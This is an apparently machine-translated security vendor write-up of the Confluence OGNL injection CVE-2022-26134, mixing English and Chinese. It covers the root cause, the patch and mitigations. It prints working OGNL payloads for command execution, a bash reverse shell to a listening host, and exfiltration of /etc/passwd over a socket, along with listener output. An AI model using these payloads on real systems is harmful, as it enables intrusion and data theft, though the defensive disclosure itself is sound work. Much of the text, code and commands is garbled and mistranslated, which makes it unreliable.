Last updated at Thu, 25 Jul 2024 19:25:16 GMT

On June 2, 2022, Atlassian published a security advisory for CVE-2022-26134, 在Confluence服务器和Confluence数据中心中存在一个严重的未经身份验证的远程代码执行漏洞. 该漏洞在6月2日发布时未被修补. 截至6月3日,补丁和临时解决方案都可用.

CVE-2022-26134 is being actively and widely exploited in the wild. Rapid7's Managed Detection and Response (MDR) 截至6月3日,团队已经观察到客户环境中可能利用CVE-2022-26134的情况有所上升.

所有支持的Confluence Server和Data Center版本都会受到影响.
Atlassian在6月3日更新了他们的建议,以反映这种可能性 all versions 影响Confluence Server和Data Center的运行(无论是否支持), 但他们尚未确认最早受影响的版本. 组织应该安装补丁或应用解决方案 emergency basis. 如果无法减轻任何版本的Confluence的漏洞, 您应该立即限制或禁用Confluence Server和Confluence Data Center实例.

Technical analysis

CVE-2022-26314是一个未经身份验证的远程OGNL注入漏洞,导致代码在Confluence服务器上下文中执行(通常为 confluence user on Linux installations). Given the nature of the vulnerability, internet-facing Confluence servers are at very high risk.

去年,Atlassian Confluence遭遇了另一次未经认证的远程OGNL注入, CVE-2021-26084. 维护面向互联网的Confluence或Data Server的组织可能想要考虑永久地将访问转移到VPN后面.

The vulnerability

如前所述,该漏洞是影响HTTP服务器的OGNL注入漏洞. OGNL有效负载放在HTTP请求的URI中. 任何类型的HTTP方法似乎都可以工作,无论是有效的(GET、POST、PUT等)还是无效的(e.g. “BALH”). 在其最简单的形式中,滥用该漏洞的攻击是这样的:

curl -v

Above, the exploit is URL-encoded. 该漏洞包含了从内容位置开始到最后一个实例的所有内容 /. Decoded it looks like this:

${@java.lang.Runtime@getRuntime().exec("touch /tmp/r7")}

利用的证据通常可以在访问日志中找到,因为利用存储在HTTP请求字段中. For example, on our test Confluence (version 7.13.6 LTS), the log file /opt/atlassian/confluence/logs/conf_access_log..log 使用后包含以下条目:

[02/Jun/2022:16:02:13 -0700] - http-nio-8090- execo - GET /%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22touch%20/tmp/r7%22%29%7D/ HTTP/1.1 302 20ms - - curl/7.68.0

扫描易受攻击的服务器很容易,因为攻击者可以利用漏洞迫使服务器在HTTP响应中发送命令输出. 例如,下面的请求将返回的响应 whoami in the attacker-created X-Cmd-Response HTTP字段(感谢Rapid7的布兰登·特纳为下面的漏洞). Note the X-Cmd-Response: confluence line in the HTTP response:

curl -v % 28% 22 x-cmd-response % 22% 2 c % 23 7 d / % 29% 29%
*   Trying
* Connected to ( port 8090 (#0)
> GET / % 22 x-cmd-response % 22% 2 c % 23 28% % 29% 29% 7 d / HTTP / 1.1
> Host:
> User-Agent: curl/7.68.0
> Accept: */*
* Mark bundle as not supporting multiuse
< HTTP/1.1 302 
< Cache-Control: no-store
< Expires: Thu, 01 Jan 1970 00:00:00 GMT
< X-Confluence-Request-Time: 1654212503090
< Set-Cookie: JSESSIONID=34154443DC363351DD0FE3D1EC3BEE01; Path=/; HttpOnly
< X-XSS-Protection: 1; mode=block
< X-Content-Type-Options: nosniff
< X-Frame-Options: SAMEORIGIN
< Content-Security-Policy: frame-ancestors 'self'
< X-Cmd-Response: confluence 
< Location: /login.action? % 28% 22 x-cmd-response % 22% 2 c % 23 7 d % 2 findex % 29% 29%.action&permissionViolation=true
< Content-Type: text/html;charset=UTF-8
< Content-Length: 0
< Date: Thu, 02 Jun 2022 23:28:23 GMT
* Connection #0 to host left intact

Decoding the exploit in the curl request shows how this is achieved. The exploit saves the output of the exec call and uses setHeader 将结果包含在服务器对攻击者的响应中.


Root cause

我们的调查发现了以下部分调用堆栈. 调用堆栈演示了起始的OGNL注入 HttpServlet.service to OgnlValueStack.findValue and beyond.

at ognl.SimpleNode.evaluateGetValueBody(
at ognl.SimpleNode.getValue(
at ognl.Ognl.getValue(
at ognl.Ognl.getValue(
at com.opensymphony.xwork.util.OgnlValueStack.findValue(
at com.opensymphony.xwork.util.TextParseUtil.translateVariables(
at com.opensymphony.xwork.ActionChainResult.execute(
at com.opensymphony.xwork.DefaultActionInvocation.executeResult(
at com.opensymphony.xwork.DefaultActionInvocation.invoke(
at com.atlassian.confluence.xwork.FlashScopeInterceptor.intercept(
at com.opensymphony.xwork.DefaultActionInvocation.invoke(
at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(
at com.opensymphony.xwork.DefaultActionInvocation.invoke(
at com.atlassian.confluence.core.actions.LastModifiedInterceptor.intercept(
at com.opensymphony.xwork.DefaultActionInvocation.invoke(
at com.atlassian.confluence.core.ConfluenceAutowireInterceptor.intercept(
at com.opensymphony.xwork.DefaultActionInvocation.invoke(
at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(
at com.opensymphony.xwork.DefaultActionInvocation.invoke(
at com.atlassian.xwork.interceptors.TransactionalInvocation.invokeAndHandleExceptions (
at com.atlassian.xwork.interceptors.TransactionalInvocation.invokeInTransaction(
at com.atlassian.xwork.interceptors.XWorkTransactionInterceptor.intercept(
at com.opensymphony.xwork.DefaultActionInvocation.invoke(
at com.atlassian.confluence.xwork.SetupIncompleteInterceptor.intercept(
at com.opensymphony.xwork.DefaultActionInvocation.invoke(
at com.opensymphony.xwork.DefaultActionInvocation.invoke(
at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(
at com.opensymphony.xwork.DefaultActionInvocation.invoke(
at com.opensymphony.xwork.DefaultActionProxy.execute(
at com.atlassian.confluence.servlet.ConfluenceServletDispatcher.serviceAction(
at com.opensymphony.webwork.dispatcher.ServletDispatcher.service(
at javax.servlet.http.HttpServlet.service(

OgnlValueStack findValue(str) 是重要的,因为它是要评估的OGNL表达式的起点. As we can see in the call stack above, TextParseUtil.class invokes OgnlValueStack.findValue when this vulnerability is exploited.

public class TextParseUtil {
        StringBuilder sb = new StringBuilder();
        Pattern p = Pattern.compile("\\$\\{([^}]*)\\}");
        Matcher m = p.matcher(expression);
        int previous = 0;
        while (m.find()) {
            String str1, g =;
            int start = m.start();
            try {
                Object o = stack.findValue(g);
                str1 = (o == null) ? "" : o.toString();
            } catch (Exception ignored) {
                str1 = "";
            sb.append(expression.substring(previous, start)).append(str1);
            previous = m.end();
        if (previous < expression.length())
        return sb.toString();

ActionChainResult.class calls TextParseUtil.translateVariables using this.namespace as the provided expression:

public void execute(ActionInvocation调用)抛出异常{
    if (this.namespace == null)
        this.namespace = invocation.getProxy().getNamespace(); 
    OgnlValueStack stack = ActionContext.getContext().getValueStack();
    String finalNamespace = TextParseUtil.translateVariables(this.namespace, stack);
    String finalActionName = TextParseUtil.translateVariables(this.actionName, stack);

Where namespace is created from the request URI string in com.opensymphony.webwork.dispatcher.ServletDispatcher.getNamespaceFromServletPath:

getNamespaceFromServletPath(字符串servletPath) {
    servletPath = servletPath.substring(0, servletPath.lastIndexOf("/"));
    return servletPath;

结果是攻击者提供的URI将被转换为名称空间, 然后找到它的方式到OGNL表达式评估. At a high level, this is very similar to CVE-2018-11776Apache Struts2命名空间OGNL注入漏洞. 只是提醒你,这个世界上没有新鲜的东西.

The patch

2022年6月3日,Atlassian指示客户更换 xwork- with a newly released xwork-1.0.3-atlassian-10.jar. The xwork jars contain the ActionChainResult.class and TextParseUtil.class 我们将其确定为OGNL表达式评估的路径.

这个补丁做了一些小的改变来解决这个问题. For one, namespace is no longer passed down to TextParseUtil.translateVariables from ActionChainResult.execute:


public void execute(ActionInvocation调用)抛出异常{
    if (this.namespace == null)
        this.namespace = invocation.getProxy().getNamespace(); 
    OgnlValueStack stack = ActionContext.getContext().getValueStack();
    String finalNamespace = TextParseUtil.translateVariables(this.namespace, stack);
    String finalActionName = TextParseUtil.translateVariables(this.actionName, stack);


  public void execute(ActionInvocation调用)抛出异常{
    if (this.namespace == null)
      this.namespace = invocation.getProxy().getNamespace(); 
    String finalNamespace = this.namespace;
    String finalActionName = this.actionName;

Atlassian also added SafeExpressionUtil.class to the xworks jar. SafeExpressionUtil.class 提供对不安全表达式的过滤,并已插入到 OgnlValueStack.class in order to examine expressions when findValue is invoked. For example:

  public Object findValue(String expr) {
    try {
      if (expr == null)
        return null; 
      if (!this.safeExpressionUtil.isSafeExpression(expr))
        return null; 
      if (this.overrides != null && this.overrides.containsKey(expr))


OGNL注入原语为攻击者提供了许多选择. Volexity’s excellent Zero-Day Exploitation of Atlassian Confluence discusses JSP webshells being dropped to disk. 但是,Confluence Server通常应执行为 confluence and not root. The confluence 用户是相当受限的,无法引入web shell(据我们所知).

除此之外,Java提供了各种各样的特性来帮助实现和维护执行(有和没有接触磁盘)。. 这里不可能全部演示,但是通过Java的反向shell路由 Nashorn Engine也许是一个值得他人探索的有趣的地方.

curl -v命令% 27 bash 28% % 27% 2 c % 27度% 27% 2 c % 27个bash %我% 20% 3 e % 20 / dev / tcp / 10 26%.0.0.28/1270%200%3E%261%27%29.start%28%29%22%29%7D/

Decoded, the exploit looks like the following:

${new javax.script.ScriptEngineManager().getEngineByName("nashorn").eval("new java.lang.ProcessBuilder().command('bash','-c','bash -i >& /dev/tcp/ 0>&1').start()")}

And results in a reverse shell:

albinolobster@ubuntu:~$ nc -lvnp 1270
Listening on 1270
Connection received on 37148
bash: no job control in this shell
bash: /root/.bashrc: Permission denied
confluence@ubuntu: / opt / atlassian融合/ bin / $ id
Uid =1001(汇流)gid=1002(汇流)组=1002(汇流)
confluence@ubuntu: / opt / atlassian /融合美元/ bin

Of course, 如果受害者正在运行某种类型的威胁检测软件,攻击者可能会冒很大的风险. 只在内存中执行是最不可能被攻击者抓住的. 作为一个例子,我们组合了一个简单的漏洞,如下所示 /etc/passwd 然后把它转移到攻击者那里,而不会爆炸.

curl -v / etc / passwd % % 28% 27% 29% 29% 29% 3 bvar % 20袜子% 20%新% 20 java 3 d % b 2 c % 201270% 29% 28% - 27% % 20 var % 20输出% 20%新% 20 java 3 d %


${new javax.script.ScriptEngineManager().getEngineByName("nashorn").eval("var data = new java.lang.String(java.nio.file.Files.readAllBytes(java.nio.file.Paths.get('/etc/passwd')));var sock = new'', 1270); var output = new; output.write(data); output.flush(); sock.close();")}

再一次,攻击者正在监听泄露,正如你所料,就像 /etc/passd:

albinolobster@ubuntu:~$ nc -lvnp 1270
Listening on 1270
Connection received on 37162
守护进程:x: 1:1:守护进程:/ usr / sbin: / usr / sbin / nologin
游戏:x: 5:60:游戏:/ usr /游戏:/ usr / sbin / nologin
男:x: 12:男:/ var /缓存/男:/ usr / sbin / nologin
… truncated …

最后,请注意,该漏洞也可以完全是uri编码的. 编写依赖于的任何类型的检测逻辑 just the ASCII form will be quickly bypassed.

Mitigation guidance

Atlassian于2022年6月3日发布了CVE-2022-26134补丁. 完整的固定版本列表可在 advisory. CVE-2022-26134的临时解决方案也可用-请注意,该解决方案必须手动应用. Detailed instructions are available in Atlassian's advisory 将此解决方案应用于Confluence服务器和数据中心.15.0-7.18.0 and 7.0.0-7.14.2.

组织应该安装补丁或应用解决方案 emergency basis. 如果无法减轻任何版本的Confluence的漏洞, 您应该立即限制或禁用Confluence Server和Confluence Data Center实例. 我们建议所有组织考虑实施IP地址安全列表规则,以限制对Confluence的访问.

如果您无法将安全列表IP规则应用到您的Confluence服务器, consider adding WAF protection. Based on the details published so far, 我们建议添加Java反序列化规则来防御RCE注入漏洞, such as CVE-2021-26084. For example, see the JavaDeserializationRCE_BODY, JavaDeserializationRCE_URI, JavaDeserializationRCE_QUERYSTRING, and JavaDeserializationRCE_HEADER rules described here.

Rapid7 customers

InsightVM and Nexpose: 截至6月3日,客户可以通过两次未经身份验证的漏洞检查来评估他们对CVE-2022-26134的暴露程度, 2022:

  • 远程检查(atlassian-confluence-cve-2022-26134-remote)将于美国东部时间6月3日下午3:30发布,仅限内容
  • A remote version 查看(atlassianconfluence -cve-2022-26134),于美国东部时间6月3日晚9点发布

InsightIDR: 客户应该从Insight Agent监控的系统中查找insighttidr内置检测规则生成的警报. 以下规则生成的警报可能是相关恶意活动的指示:

  • Confluence Java App Launching Processes

The Rapid7 MDR (Managed Detection & 响应)SOC正在监控此活动,并将立即将确认的恶意活动升级给管理的客户.

tCell: 利用Java App Server Agent的客户可以通过使用OS Commands块功能来保护自己免受攻击. For customers leveraging a Web Server Agent, 我们建议为任何以。开头的url路径创建一个块规则 ${ or %24%7B.


June 3, 2022 11:20 AM EDT: 本博客已经更新,以反映所有支持的版本的Confluence服务器和Confluence数据中心受到影响, and it's likely that all versions (including LTS and unsupported) are affected, 但Atlassian尚未确定最早的易受攻击版本.

June 3, 2022 11:45 AM EDT: Atlassian发布了CVE-2022-26134的临时解决方案. The workaround must be manually applied. Detailed instructions are available in Atlassian's advisory 将此解决方案应用于Confluence服务器和数据中心.15.0-7.18.0 and 7.0.0-7.14.2.

June 3, 2022 1:15 PM EDT: Atlassian发布了针对CVE-2022-26134的补丁. A full list of fixed versions is available in their advisory. Rapid7建议应用补丁或临时解决方案(手动) emergency basis.

June 3, 2022 3:15 PM EDT: 本博客中添加了CVE-2022-26134的完整技术分析,以帮助安全从业者了解此漏洞并确定其优先级. 针对InsightVM和expose客户的漏洞检查正在积极开发中,目标是今天下午发布.

June 3, 2022 3:30 PM EDT: InsightVM和expose客户可以在今天(6月3日)通过远程漏洞检查来评估他们对CVE-2022-26134的暴露程度, 2022) content release.

June 6, 2022 10 AM EDT: 第二份内容发布于周五晚上, 6月3日包含CVE-2022-26134的远程版本检查. 这意味着InsightVM和expose客户能够通过两次未经身份验证的漏洞检查来评估他们对CVE-2022-26134的暴露.

攻击者针对Confluence服务器和Confluence数据中心的本地实例的活动持续增加. 尚未应用补丁或解决方案的组织应该这样做 assume compromise 并激活事件响应协议,除了在紧急情况下修复CVE-2022-26134之外.

下载Rapid7年度漏洞情报报告 ▶︎

